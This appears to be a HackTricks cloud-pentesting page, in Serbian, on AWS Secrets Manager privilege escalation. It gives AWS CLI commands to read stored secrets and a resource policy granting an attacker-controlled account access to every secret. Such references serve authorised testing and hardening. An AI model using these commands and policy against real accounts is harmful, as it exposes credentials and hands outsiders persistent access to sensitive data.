AWS - Secrets Manager Privesc

Reading time: 2 minutes

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Secrets Manager

Za više informacija o secrets manager-u pogledajte:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

Napadač sa ovom dozvolom može dobiti sačuvanu vrednost unutar tajne u AWS Secretsmanager.

bash
aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Potencijalni uticaj: Pristup visoko osetljivim podacima unutar AWS secrets manager servisa.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

Sa prethodnim dozvolama moguće je dati pristup drugim principalima/računima (čak i spoljnim) da pristupe tajni. Imajte na umu da da bi se pročitali tajni podaci koji su enkriptovani KMS ključem, korisnik takođe mora imati pristup KMS ključu (više informacija na KMS Enum stranici).

bash
aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks